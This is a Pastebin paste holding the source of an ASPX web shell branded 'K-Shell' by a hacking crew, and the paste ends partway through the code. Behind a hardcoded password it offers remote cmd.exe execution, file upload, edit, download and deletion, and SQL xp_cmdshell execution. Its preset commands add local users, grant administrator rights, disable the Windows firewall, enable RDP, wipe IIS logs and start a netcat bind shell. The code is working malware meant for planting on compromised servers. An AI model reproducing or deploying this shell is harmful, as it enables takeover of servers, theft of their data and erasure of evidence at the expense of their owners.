Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <%@ Page Language="VB" ContentType="text/html" validateRequest="false" aspcompat="true"%>
- <%@ Import Namespace="System.IO" %>
- <%@ import namespace="System.Diagnostics" %>
- <script runat="server">
- Dim PASSWORD as string = "XXx_Death_xXX" 'Here , change the default password "XXx_Death_xXX" to yours
- '----------------------------------------------------------------------
- '----------------- K-Shell by XXx_Death_xXX ZHC -----------------
- '----------------- E-mail: [email protected] -----------------
- '----------------- http://zone-hack.com -----------------
- '----------------- Version 1.0 -----------------
- '----------------- Build (2011-10-10) -----------------
- '----------- This shell base on WebAdmin2.0(beta) By lake2 ------------
- '------------ and Asp.Net Security Analyzer by Dinis.cruz ------------
- '----------------------------------------------------------------------
- dim url,TEMP1,TEMP2,TITLE as string
- Sub Login_click(sender As Object, E As EventArgs)
- if Textbox.Text=PASSWORD then
- session("XXx_Death_xXX")=1
- session.Timeout=45
- else
- response.Write("<font color='red'>Your password is incorrect! Please check your password and try again.</font><br>")
- end if
- End Sub
- Sub RunCMD(Src As Object, E As EventArgs)
- Dim myProcess As New Process()
- Dim myProcessStartInfo As New ProcessStartInfo("cmd.exe")
- myProcessStartInfo.UseShellExecute = False
- myProcessStartInfo.RedirectStandardOutput = true
- myProcess.StartInfo = myProcessStartInfo
- myProcessStartInfo.Arguments="/c " & Cmd.text
- myProcess.Start()
- Dim myStreamReader As StreamReader = myProcess.StandardOutput
- Dim myString As String = myStreamReader.Readtoend()
- myProcess.Close()
- mystring=replace(mystring,">","<")
- mystring=replace(mystring,"<",">")
- result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
- Cmd.text=""
- End Sub
- Sub RunCMD2(Src As Object, E As EventArgs)
- Dim myProcess2 As New Process()
- Dim myProcessStartInfo2 As New ProcessStartInfo("cmd.exe")
- myProcessStartInfo2.UseShellExecute = False
- myProcessStartInfo2.RedirectStandardOutput = true
- myProcess2.StartInfo = myProcessStartInfo2
- myProcessStartInfo2.Arguments="/c " & Cmd2.text
- myProcess2.Start()
- Dim myStreamReader2 As StreamReader = myProcess2.StandardOutput
- Dim myString2 As String = myStreamReader2.Readtoend()
- myProcess2.Close()
- mystring2=replace(mystring2,">","<")
- mystring2=replace(mystring2,"<",">")
- result.text=Cmd2.text & vbcrlf & "<pre>" & mystring2 & "</pre>"
- Cmd2.text=""
- End Sub
- Sub RunCMD3(Src As Object, E As EventArgs)
- Dim myProcess3 As New Process()
- Dim myProcessStartInfo3 As New ProcessStartInfo("cmd.exe")
- myProcessStartInfo3.UseShellExecute = False
- myProcessStartInfo3.RedirectStandardOutput = true
- myProcess3.StartInfo = myProcessStartInfo3
- myProcessStartInfo3.Arguments="/c " & Cmd3.text
- myProcess3.Start()
- Dim myStreamReader3 As StreamReader = myProcess3.StandardOutput
- Dim myString3 As String = myStreamReader3.Readtoend()
- myProcess3.Close()
- mystring3=replace(mystring3,">","<")
- mystring3=replace(mystring3,"<",">")
- result.text=Cmd3.text & vbcrlf & "<pre>" & mystring3 & "</pre>"
- Cmd3.text=""
- End Sub
- Sub RunCMD4(Src As Object, E As EventArgs)
- Dim myProcess4 As New Process()
- Dim myProcessStartInfo4 As New ProcessStartInfo("cmd.exe")
- myProcessStartInfo4.UseShellExecute = False
- myProcessStartInfo4.RedirectStandardOutput = true
- myProcess4.StartInfo = myProcessStartInfo4
- myProcessStartInfo4.Arguments="/c " & Cmd4.text
- myProcess4.Start()
- Dim myStreamReader4 As StreamReader = myProcess4.StandardOutput
- Dim myString4 As String = myStreamReader4.Readtoend()
- myProcess4.Close()
- mystring4=replace(mystring4,">","<")
- mystring4=replace(mystring4,"<",">")
- result.text=Cmd4.text & vbcrlf & "<pre>" & mystring4 & "</pre>"
- Cmd4.text=""
- End Sub
- Sub RunCMD5(Src As Object, E As EventArgs)
- Dim myProcess5 As New Process()
- Dim myProcessStartInfo5 As New ProcessStartInfo("cmd.exe")
- myProcessStartInfo5.UseShellExecute = False
- myProcessStartInfo5.RedirectStandardOutput = true
- myProcess5.StartInfo = myProcessStartInfo5
- myProcessStartInfo5.Arguments="/c " & Cmd5.text
- myProcess5.Start()
- Dim myStreamReader5 As StreamReader = myProcess5.StandardOutput
- Dim myString5 As String = myStreamReader5.Readtoend()
- myProcess5.Close()
- mystring5=replace(mystring5,">","<")
- mystring5=replace(mystring5,"<",">")
- result.text=Cmd5.text & vbcrlf & "<pre>" & mystring5 & "</pre>"
- Cmd5.text=""
- End Sub
- Sub RunCMD6(Src As Object, E As EventArgs)
- Dim myProcess6 As New Process()
- Dim myProcessStartInfo6 As New ProcessStartInfo("cmd.exe")
- myProcessStartInfo6.UseShellExecute = False
- myProcessStartInfo6.RedirectStandardOutput = true
- myProcess6.StartInfo = myProcessStartInfo6
- myProcessStartInfo6.Arguments="/c " & Cmd6.text
- myProcess6.Start()
- Dim myStreamReader6 As StreamReader = myProcess6.StandardOutput
- Dim myString6 As String = myStreamReader6.Readtoend()
- myProcess6.Close()
- mystring6=replace(mystring6,">","<")
- mystring6=replace(mystring6,"<",">")
- result.text=Cmd6.text & vbcrlf & "<pre>" & mystring6 & "</pre>"
- Cmd6.text=""
- End Sub
- Sub RunCMD7(Src As Object, E As EventArgs)
- Dim myProcess7 As New Process()
- Dim myProcessStartInfo7 As New ProcessStartInfo("cmd.exe")
- myProcessStartInfo7.UseShellExecute = False
- myProcessStartInfo7.RedirectStandardOutput = true
- myProcess7.StartInfo = myProcessStartInfo7
- myProcessStartInfo7.Arguments="/c " & Cmd7.text
- myProcess7.Start()
- Dim myStreamReader7 As StreamReader = myProcess7.StandardOutput
- Dim myString7 As String = myStreamReader7.Readtoend()
- myProcess7.Close()
- mystring7=replace(mystring7,">","<")
- mystring7=replace(mystring7,"<",">")
- result.text=Cmd7.text & vbcrlf & "<pre>" & mystring7 & "</pre>"
- Cmd7.text=""
- End Sub
- sub Editor(Src As Object, E As EventArgs)
- dim mywrite as new streamwriter(filepath.text,false,encoding.default)
- mywrite.write(content.text)
- mywrite.close
- response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
- end sub
- Sub UpLoad(Src As Object, E As EventArgs)
- dim filename,loadpath as string
- filename=path.getfilename(UpFile.value)
- loadpath=request.QueryString("src") & filename
- if file.exists(loadpath)=true then
- response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
- response.End()
- end if
- UpFile.postedfile.saveas(loadpath)
- response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
- response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
- End Sub
- Sub NewFD(Src As Object, E As EventArgs)
- url=request.form("src")
- if NewFile.Checked = True then
- dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
- mywrite.close
- response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
- else
- directory.createdirectory(url & NewName.Text)
- response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
- end if
- End Sub
- Sub del(a)
- if right(a,1)="\" then
- dim xdir as directoryinfo
- dim mydir as new DirectoryInfo(a)
- dim xfile as fileinfo
- for each xfile in mydir.getfiles()
- file.delete(a & xfile.name)
- next
- for each xdir in mydir.getdirectories()
- call del(a & xdir.name & "\")
- next
- directory.delete(a)
- else
- file.delete(a)
- end if
- End Sub
- Sub copydir(a,b)
- dim xdir as directoryinfo
- dim mydir as new DirectoryInfo(a)
- dim xfile as fileinfo
- for each xfile in mydir.getfiles()
- file.copy(a & "\" & xfile.name,b & xfile.name)
- next
- for each xdir in mydir.getdirectories()
- directory.createdirectory(b & path.getfilename(a & xdir.name))
- call copydir(a & xdir.name & "\",b & xdir.name & "\")
- next
- End Sub
- Sub xexistdir(temp,ow)
- if directory.exists(temp)=true or file.exists(temp)=true then
- if ow=0 then
- response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
- elseif ow=1 then
- del(temp)
- else
- dim d as string = session("cutboard")
- if right(d,1)="\" then
- TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
- else
- TEMP2=url & second(now) & replace(path.getfilename(d),"","")
- end if
- end if
- end if
- End Sub
- Sub existdir(temp)
- if file.exists(temp)=false and directory.exists(temp)=false then
- response.Write("<center>This drive is not an accessible drive...</center>")
- response.End()
- end if
- End Sub
- Sub RunSQLCMD(Src As Object, E As EventArgs)
- Dim adoConn,strQuery,recResult,strResult
- if SqlName.Text<>"" then
- adoConn=Server.CreateObject("ADODB.Connection")
- adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text)
- If Sqlcmd.Text<>"" Then
- strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
- recResult = adoConn.Execute(strQuery)
- If NOT recResult.EOF Then
- Do While NOT recResult.EOF
- strResult = strResult & chr(13) & recResult(0).value
- recResult.MoveNext
- Loop
- End if
- recResult = Nothing
- strResult = Replace(strResult," "," ")
- strResult = Replace(strResult,"<","<")
- strResult = Replace(strResult,">",">")
- resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
- SqlCMD.Text=""
- End if
- adoConn.Close
- End if
- End Sub
- Function GetStartedTime(ms)
- GetStartedTime=cint(ms/(1000*60*60))
- End function
- Function getIP()
- Dim strIPAddr as string
- If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
- strIPAddr = Request.ServerVariables("REMOTE_ADDR")
- ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
- strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
- ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
- strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
- Else
- strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
- End If
- getIP = Trim(Mid(strIPAddr, 1, 30))
- End Function
- Function Getparentdir(nowdir)
- dim temp,k as integer
- temp=1
- k=0
- if len(nowdir)>4 then
- nowdir=left(nowdir,len(nowdir)-1)
- end if
- do while temp<>0
- k=temp+1
- temp=instr(temp,nowdir,"\")
- if temp =0 then
- exit do
- end if
- temp = temp+1
- loop
- if k<>2 then
- getparentdir=mid(nowdir,1,k-2)
- else
- getparentdir=nowdir
- end if
- End function
- Function Rename()
- url=request.QueryString("src")
- if file.exists(Getparentdir(url) & request.Form("name")) then
- rename=0
- else
- file.copy(url,Getparentdir(url) & request.Form("name"))
- del(url)
- rename=1
- end if
- End Function
- Function GetSize(temp)
- if temp < 1024 then
- GetSize=temp & " bytes"
- else
- if temp\1024 < 1024 then
- GetSize=temp\1024 & " KB"
- else
- if temp\1024\1024 < 1024 then
- GetSize=temp\1024\1024 & " MB"
- else
- GetSize=temp\1024\1024\1024 & " GB"
- end if
- end if
- end if
- End Function
- Sub downTheFile(thePath)
- dim stream
- stream=server.createObject("adodb.stream")
- stream.open
- stream.type=1
- stream.loadFromFile(thePath)
- response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
- response.addHeader("Content-Length",stream.Size)
- response.charset="UTF-8"
- response.contentType="application/octet-stream"
- response.binaryWrite(stream.read)
- response.flush
- stream.close
- stream=nothing
- response.End()
- End Sub
- </script>
- <%
- if request.QueryString("action")="down" and session("XXx_Death_xXX")=1 then
- downTheFile(request.QueryString("src"))
- response.End()
- end if
- Dim hu as string = request.QueryString("action")
- if hu="cmd" then
- TITLE="CMD.NET"
- elseif hu="sqlrootkit" then
- TITLE="zone-hack.com.NET"
- elseif hu="clonetime" then
- TITLE="Clone Time"
- elseif hu="information" then
- TITLE="Web Server Info"
- elseif hu="goto" then
- TITLE="aspx zhc shell by xxx_death_xxx::2011"
- else
- TITLE=request.ServerVariables("HTTP_HOST")
- end if
- %>
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
- <html>
- <p align="center"><img alt="" title="" src="http://img851.imageshack.us/img851/2304/bismillahus.jpg" /><br />
- </p>
- <div align="center"></div>
- <style type="text/css">
- body,td,th {
- color: #FFFFFF;
- font-family: Comic Sans Ms;
- }
- body {
- background-image: url("http://a6.sphotos.ak.fbcdn.net/hphotos-ak-snc6/262108_109964339097628_100002521874736_97359_1521760_n.jpg");
- background-position: center center;
- background-repeat: no-repeat;
- background-color: #000000;
- background-attachment: fixed;
- font-family: Comic Sans MS;
- font-size: 16px;
- }
- a:link {
- color: #FFFFFF;
- text-decoration: none;
- }
- a:visited {
- text-decoration: none;
- color: #FFFFFF;
- }
- a:hover {
- text-decoration: none;
- color: #00FF00;
- }
- a:active {
- text-decoration: none;
- color: #00FF00;
- }
- .button {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}
- .TextBox {border: 1px solid #084B8E}
- .style3 {color: #00FF00}
- .text {font-family: Comic Sans MS; font-size: 18px}
- .title {font-family: Comic Sans MS; font-size: 22px;}
- .footer {font-size: 12px;}
- </style>
- <head>
- <meta http-equiv="Content-Type" content="text/html">
- <title>Aspx Shell By XXx_Death_xXX & ZHC</title>
- </head>
- <body>
- <%
- Dim error_x as Exception
- Try
- if session("XXx_Death_xXX")<>1 then
- response.Write("<br>")
- response.Write("<center><span class=""title""><b>Welcome to ZCompany Hacking Crew Shell</b></span></center><br>")
- response.Write("<center><span class=""style3"">Note:</span> You MUST click the login button and not hit enter.</center>")
- %>
- <form runat="server">
- <br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
- <center>Password:<asp:TextBox ID="TextBox" runat="server" TextMode="Password" class="TextBox" />
- <asp:Button ID="Button" runat="server" Text="Login" ToolTip="Click here to login" OnClick="login_click" class="button" /></center>
- </form>
- <%
- else
- dim temp as string
- temp=request.QueryString("action")
- if temp="" then temp="goto"
- select case temp
- case "goto"
- if request.QueryString("src")<>"" then
- url=request.QueryString("src")
- else
- url=server.MapPath(".") & "\"
- end if
- call existdir(url)
- dim xdir as directoryinfo
- dim mydir as new DirectoryInfo(url)
- dim hupo as string
- dim xfile as fileinfo
- %>
- <p align="center">Current Directory: <font color= #00FF00><%=url%></font></p>
- <table width="75%" border="0" align="center">
- <tr>
- <td width="13%">Action:</td>
- <td width="87%">
- <a href="?action=new&src=<%=server.UrlEncode(url)%>" title="New file or directory">New</a> |
- <a href="?action=upfile&src=<%=server.UrlEncode(url)%>" title="Upload file"> Upload</a> |
- <a href="?action=goto&src=" & <%=server.MapPath(".")%> title="Go to this file's directory"> Index Root</a> |
- <a href="?action=logout" title="Exit"> Exit</a></td>
- </tr>
- <tr>
- <td>
- Drive: </td>
- <td>
- <%
- dim i as integer
- for i =0 to Directory.GetLogicalDrives().length-1
- response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")
- next
- %>
- </td>
- </tr>
- <tr>
- <td>Tools:</td>
- <td><a href="?action=sqlrootkit" target="_blank">SQL Command</a> |<a href="?action=cmd" target="_blank"> Command Line</a> |<a href="?action=information" target="_blank"> System Information</a></td>
- </tr>
- <tr>
- <td width="20%">Admin Tricks: </td>
- <td width="80%"><a href="?action=cmd5" target="_blank">Add User</a> |<a href="?action=cmd6" target="_blank"> Add User To Administrators Group</a> |<a href="?action=cmd7" target="_blank"> Disable Windows Firewall</a> |<a href="?action=cmd4" target="_blank"> Enable RDP</a> |<a href="?action=cmd3" target="_blank"> Wipe IIS Logs</a></td>
- </tr>
- <tr>
- <td width="20%">Silentz's Tricks: </td>
- <td width="80%"><a href="?action=cmd2" target="_blank">Start NC</a></td>
- </tr>
- </table>
- <hr noshade width="70%">
- <table width="90%" border="0" align="center">
- <tr>
- <td width="30%"><strong>Name</strong></td>
- <td width="10%"><strong>Size</strong></td>
- <td width="20%"><strong>Last Modified</strong></td>
- <td width="25%"><strong>Action</strong></td>
- </tr>
- <tr>
- <td><%
- hupo= "<tr><td><a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'><i>|Parent Directory|</i></a></td></tr>"
- response.Write(hupo)
- for each xdir in mydir.getdirectories()
- response.Write("<tr>")
- dim filepath as string
- filepath=server.UrlEncode(url & xdir.name)
- hupo= "<td><a href='?action=goto&src=" & filepath & "\" & "'>" & xdir.name & "</a></td>"
- response.Write(hupo)
- response.Write("<td><dir></td>")
- response.Write("<td>" & Directory.GetLastWriteTime(url & xdir.name) & "</td>")
- hupo="<td><a href='?action=cut&src=" & filepath & "\' target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\' target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a></td>"
- response.Write(hupo)
- response.Write("</tr>")
- next
- %></td>
- </tr>
- <tr>
- <td><%
- for each xfile in mydir.getfiles()
- dim filepath2 as string
- filepath2=server.UrlEncode(url & xfile.name)
- response.Write("<tr>")
- hupo="<td>" & xfile.name & "</td>"
- response.Write(hupo)
- hupo="<td>" & GetSize(xfile.length) & "</td>"
- response.Write(hupo)
- response.Write("<td>" & file.GetLastWriteTime(url & xfile.name) & "</td>")
- hupo="<td><a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a></td>"
- response.Write(hupo)
- response.Write("</tr>")
- next
- response.Write("</table>")
- %></td>
- </tr>
- <tr>
- <td><hr noshade width="70%"></td>
- </tr>
- </table>
- <script language="javascript">
- function del()
- {
- if(confirm("Are you sure?")){return true;}
- else{return false;}
- }
- function down()
- {
- if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}
- else{return false;}
- }
- </script>
- <%
- case "information"
- dim CIP,CP as string
- if getIP()<>request.ServerVariables("REMOTE_ADDR") then
- CIP=getIP()
- CP=request.ServerVariables("REMOTE_ADDR")
- else
- CIP=request.ServerVariables("REMOTE_ADDR")
- CP="None"
- end if
- %>
- <center><p>[ System information ]</p><br/>
- <table width="80%" border="1" align="center">
- <tr>
- <td colspan="2"><span class="style3"><b>Web Server Information</b></span></td>
- </tr>
- <tr>
- <td width="40%">Server IP</td>
- <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%></td>
- </tr>
- <tr>
- <td height="73">Machine Name</td>
- <td><%=Environment.MachineName%></td>
- </tr>
- <tr>
- <td>Network Name</td>
- <td><%=Environment.UserDomainName.ToString()%></td>
- </tr>
- <tr>
- <td>User Name in this Process</td>
- <td><%=Environment.UserName%></td>
- </tr>
- <tr>
- <td>OS Version</td>
- <td><%=Environment.OSVersion.ToString()%></td>
- </tr>
- <tr>
- <td>Started Time</td>
- <td><%=GetStartedTime(Environment.Tickcount)%> Hours</td>
- </tr>
- <tr>
- <td>System Time</td>
- <td><%=now%></td>
- </tr>
- <tr>
- <td>IIS Version</td>
- <td><%=request.ServerVariables("SERVER_SOFTWARE")%></td>
- </tr>
- <tr>
- <td>HTTPS</td>
- <td><%=request.ServerVariables("HTTPS")%></td>
- </tr>
- <tr>
- <td>PATH_INFO</td>
- <td><%=request.ServerVariables("PATH_INFO")%></td>
- </tr>
- <tr>
- <td>PATH_TRANSLATED</td>
- <td><%=request.ServerVariables("PATH_TRANSLATED")%></td>
- <tr>
- <td>SERVER_PORT</td>
- <td><%=request.ServerVariables("SERVER_PORT")%></td>
- </tr>
- <tr>
- <td>SeesionID</td>
- <td><%=Session.SessionID%></td>
- </tr>
- <tr>
- <td colspan="2"><span class="style3"><b>Client Infomation</b></span></td>
- </tr>
- <tr>
- <td>Client Proxy</td>
- <td><%=CP%></td>
- </tr>
- <tr>
- <td>Client IP</td>
- <td><%=CIP%></td>
- </tr>
- <tr>
- <td>User</td>
- <td><%=request.ServerVariables("HTTP_USER_AGENT")%></td>
- </tr>
- </table>
- <%
- case "cmd"
- %>
- <form runat="server">
- <center><p>[ Command Prompt ]</p>
- <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
- Command:
- <asp:TextBox ID="cmd" runat="server" Width="300" class="TextBox" />
- <asp:Button ID="Button123" runat="server" Text="Run" OnClick="RunCMD" class="button"/></center>
- <p>
- <asp:Label ID="result" runat="server" style="style2"/></p>
- </form>
- <%
- case "cmd2"
- %>
- <form runat="server">
- <center><p>[ Command Prompt ]</p>
- <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
- Command:
- <asp:TextBox ID="cmd2" runat="server" Width="300" class="TextBox" text="nc -l -v -p 12345 -d -e cmd.exe"/>
- <asp:Button ID="Button1234" runat="server" Text="Run" OnClick="RunCMD2" class="button" /></center>
- <p>
- <asp:Label ID="result2" runat="server" style="style2"/></p>
- </form>
- <%
- case "cmd3"
- %>
- <form runat="server">
- <center><p>[ Command Prompt ]</p>
- <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
- Command:
- <asp:TextBox ID="cmd3" runat="server" Width="300" class="TextBox" text="del C:\WINDOWS\system32\LogFiles\W3SVC1\*.log"/>
- <asp:Button ID="Button12345" runat="server" Text="Run" OnClick="RunCMD3" class="button" /></center>
- <p>
- <asp:Label ID="result3" runat="server" style="style2"/></p>
- </form>
- <%
- case "cmd4"
- %>
- <form runat="server">
- <center><p>[ Command Prompt ]</p>
- <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
- Command:
- <asp:TextBox ID="cmd4" runat="server" Width="300" class="TextBox" text="reg add hklm\system\currentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0x0 /f"/>
- <asp:Button ID="Button123456" runat="server" Text="Run" OnClick="RunCMD4" class="button" /></center>
- <p>
- <asp:Label ID="result4" runat="server" style="style2"/></p>
- </form><%
- case "cmd5"
- %>
- <form runat="server">
- <center><p>[ Command Prompt ]</p>
- <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
- Command:
- <asp:TextBox ID="cmd5" runat="server" Width="300" class="TextBox" text="net user USERNAME PASSWORD /add"/>
- <asp:Button ID="Button1234567" runat="server" Text="Run" OnClick="RunCMD5" class="button" /></center>
- <p>
- <asp:Label ID="result5" runat="server" style="style2"/></p>
- </form>
- <%
- case "cmd6"
- %>
- <form runat="server">
- <center><p>[ Command Prompt ]</p>
- <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
- Command:
- <asp:TextBox ID="cmd6" runat="server" Width="300" class="TextBox" text="net localgroup Administrators USERNAME /add"/>
- <asp:Button ID="Button12345678" runat="server" Text="Run" OnClick="RunCMD6" class="button" /></center>
- <p>
- <asp:Label ID="result6" runat="server" style="style2"/></p>
- </form>
- <%
- case "cmd7"
- %>
- <form runat="server">
- <center><p>[ Command Prompt ]</p>
- <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
- Command:
- <asp:TextBox ID="cmd7" runat="server" Width="300" class="TextBox" text="reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v EnableFirewall /t REG_DWORD /d 0x0 /f"/>
- <asp:Button ID="Button123456789" runat="server" Text="Run" OnClick="RunCMD7" class="button" /></center>
- <p>
- <asp:Label ID="result7" runat="server" style="style2"/></p>
- </form>
- <%
- case "sqlrootkit"
- %>
- <form runat="server">
- <center><p>[ SQL Command ]</p>
- <p>(<span class="style3">Note: Please CLICK "RUN" in order to execute the command</span>)</p>
- <p>SQL Host:
- <asp:TextBox ID="ip" runat="server" Width="300" class="TextBox" Text="127.0.0.1"/></p>
- <p>
- SQL Username:
- <asp:TextBox ID="SqlName" runat="server" Width="110" class="TextBox" Text='Username'/><br/>
- SQL Password:
- <asp:TextBox ID="SqlPass" runat="server" Width="110" class="TextBox" Text='Password'/>
- </p>
- Command:
- <asp:TextBox ID="Sqlcmd" runat="server" Width="300" class="TextBox"/>
- <asp:Button ID="ButtonSQL" runat="server" Text="Run" OnClick="RunSQLCMD" class="button"/>
- <p>
- <asp:Label ID="resultSQL" runat="server" style="style2"/></p></center>
- </form>
- <%
- case "del"
- dim a as string
- a=request.QueryString("src")
- call existdir(a)
- call del(a)
- response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>")
- case "copy"
- call existdir(request.QueryString("src"))
- session("cutboard")="" & request.QueryString("src")
- response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
- case "cut"
- call existdir(request.QueryString("src"))
- session("cutboard")="" & request.QueryString("src")
- response.Write("<script>alert('File info have add the cutboard, go to target directory click plaste!');location.href='JavaScript:self.close()';</script>")
- case "plaster"
- dim ow as integer
- if request.Form("OverWrite")<>"" then ow=1
- if request.Form("Cancel")<>"" then ow=2
- url=request.QueryString("src")
- call existdir(url)
- dim d as string
- d=session("cutboard")
- if left(d,1)="" then
- TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
- TEMP2=url & replace(path.getfilename(d),"","")
- if right(d,1)="\" then
- call xexistdir(TEMP1,ow)
- directory.move(replace(d,"",""),TEMP1 & "\")
- response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
- else
- call xexistdir(TEMP2,ow)
- file.move(replace(d,"",""),TEMP2)
- response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
- end if
- else
- TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
- TEMP2=url & path.getfilename(replace(d,"",""))
- if right(d,1)="\" then
- call xexistdir(TEMP1,ow)
- directory.createdirectory(TEMP1)
- call copydir(replace(d,"",""),TEMP1 & "\")
- response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
- else
- call xexistdir(TEMP2,ow)
- file.copy(replace(d,"",""),TEMP2)
- response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
- end if
- end if
- case "upfile"
- url=request.QueryString("src")
- %>
- <form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server" onSubmit="return checkname();">
- <center>Files will be uploaded to: <span class="style3"><%=url%></span><br>
- Upload:
- <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server"><br><br>
- <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="button"></center>
- </form>
- <%
- case "new"
- url=request.QueryString("src")
- %>
- <form runat="server">
- <center><%=url%><br>
- Name:
- <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
- <br>
- <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
- <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server" GroupName="New"/>
- <br><br>
- <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="button" OnClick="NewFD"/>
- <input name="Src" type="hidden" value="<%=url%>"></center>
- </form>
- <%
- case "edit"
- dim b as string
- b=request.QueryString("src")
- call existdir(b)
- dim myread as new streamreader(b,encoding.default)
- filepath.text=b
- content.text=myread.readtoend
- %>
- <form runat="server">
- <table width="80%" border="1" align="center">
- <tr> <td width="11%">Path</td>
- <td width="89%">
- <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
- *</td>
- </tr>
- <tr>
- <td>Content</td>
- <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
- </tr>
- <tr>
- <td></td>
- <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="button"/>
- </td>
- </tr>
- </table>
- </form>
- <%
- myread.close
- case "rename"
- url=request.QueryString("src")
- if request.Form("name")="" then
- %>
